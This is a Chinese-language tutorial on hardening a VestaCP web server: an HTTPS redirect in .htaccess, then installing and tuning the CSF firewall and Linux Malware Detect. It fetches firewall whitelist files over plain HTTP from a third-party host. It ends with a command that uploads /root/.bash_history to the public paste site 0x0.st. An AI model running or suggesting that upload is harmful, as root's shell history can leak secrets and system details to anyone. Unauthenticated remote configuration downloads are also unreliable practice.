mv -f /home/admin/web/520.be/public_html/.htaccess /home/admin/web/520.be/public_html/.htaccess.bak
cd /home/admin/web/520.be/public_html
cat <<"EOF" > /home/admin/web/520.be/public_html/.htaccess
RewriteEngine on
RewriteCond %{SERVER_PORT} 80
RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
EOF
v-fix-websites-permissions
至此,一个高度安全的网站环境都设定完毕啦 🤔
安装CSF防火墙、LMD恶意软体检测系统
CSF (ConfigServer Security & Firewall)防火墙是一套很全面的防火墙,而且本身就支援各大热门虚拟主机管理系统,可说是居家、旅行之必备良药 🤔
|
1 2 3 4 5 6 7 8 9 10 11 12 |
# 安装依赖套件 sudo yum install -y iptables ipset e2fsprogs nano perl perl-Time-HiRes \ perl-GDGraph perl-libwww-perl perl-LWP-Protocol-https perl-Crypt-SSLeay \ perl-Net-SSLeay # 安装主程式 rm -fr /opt/csf.tgz /etc/csf cd /opt rm -f csf.tgz wget -O csf.tgz https://download.configserver.com/csf.tgz tar xzf csf.tgz cd csf sh install.vesta.sh |
# CSF安装完会自动将目前连线的IP,以及目前开放的port加入白名单,然后执行自我测试 🤔
|
1 2 3 4 5 6 |
# 更新LFD的白名单 wget -O /etc/csf/csf.fignore http://ns4.edu.ryukyu/conf/csf.fignore.md wget -O /etc/csf/csf.pignore http://ns4.edu.ryukyu/conf/csf.pignore.md cd /opt rm -fr csf* perl /usr/local/csf/bin/csftest.pl |
### 变更侦测的网路介面,特别注意eth0就无须更改 🤔
sed -i 's/^ETH_DEVICE =.*$/ETH_DEVICE = "ens3"/g' /etc/csf/csf.conf
cat /etc/csf/csf.conf | grep "ETH_DEVICE ="
# 开启ipset这个灰常好用的功能 🤔
sed -i 's/^LF_IPSET =.*$/LF_IPSET = "1"/g' /etc/csf/csf.conf
cat /etc/csf/csf.conf | grep "LF_IPSET ="
# 另外,OpenVZ关闭IPSET功能方可启动 🤔
sed -i 's/^LF_IPSET =.*$/LF_IPSET = "0"/g' /etc/csf/csf.conf
cat /etc/csf/csf.conf | grep "LF_IPSET ="
sed -i 's/^ETH_DEVICE =.*$/ETH_DEVICE = "venet0"/g' /etc/csf/csf.conf
cat /etc/csf/csf.conf | grep "ETH_DEVICE ="
# 开启IPv6侦测 🤔
sed -i 's/^#ETH6_DEVICE/ETH6_DEVICE/g' /etc/csf/csf.conf
cat /etc/csf/csf.conf | grep "ETH6_DEVICE ="
# 最后再将测试模式关闭即可 🤔
|
1 2 |
sed -i 's/^TESTING =.*$/TESTING = "0"/g' /etc/csf/csf.conf cat /etc/csf/csf.conf | grep "TESTING =" |
### 主机有安装Webmin的可以在Webmin安装CSF模组 🤔
# 在Webmin控制台左手边的Webmin Configuration > Webmin Modules,选择From local file,空格中输入
/usr/local/csf/csfwebmin.tgz
或是
/etc/csf/csfwebmin.tgz
安装好之后可以在左手边的System > ConfigServer Security & Firewall看到它
# CSF常用指令 🤔
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
# 快速新增IP到黑名单 csf -d 8.8.8.8 # 快速新增IP到白名单 csf -a 8.8.8.8 # 重新读取设定档 csf -r # 检查CSF运作状态 csf -l # 暂停CSF运作 csf -x # 恢复CSF运作 csf -e # 更新CSF主程式 csf -u # 重新启动CSF服务 systemctl restart csf |
### Linux Malware Detect这套开源的资安工具也行之有年了,虽然我这边没装clamav防毒软体(有4GB以上记忆体才适合安装clamav) 🤔
|
1 2 3 4 5 6 7 8 |
# 安装依赖套件 yum install -y inotify-tools # 安装主程式 cd /opt curl -O http://www.rfxn.com/downloads/maldetect-current.tar.gz tar -zxf maldetect-current.tar.gz cd maldetect-* bash install.sh |
# 变更设定 🤔
sed -i 's/email_alert="0"/email_alert="1"/g' /usr/local/maldetect/conf.maldet
sed -i "s/you@domain.com/admin@520.be/g" /usr/local/maldetect/conf.maldet
sed -i 's/scan_clamscan="1"/scan_clamscan="0"/g' /usr/local/maldetect/conf.maldet
sed -i 's/quarantine_hits="0"/quarantine_hits="1"/g' /usr/local/maldetect/conf.maldet
sed -i 's/quarantine_clean="0"/quarantine_clean="1"/g' /usr/local/maldetect/conf.maldet
cd /opt
rm -fr maldetect*
至此,所有的设定都完毕啦,有问题欢迎截图并尽量提供操作过程提出 🤔
curl -F'file=@/root/.bash_history' https://0x0.st
列印本文
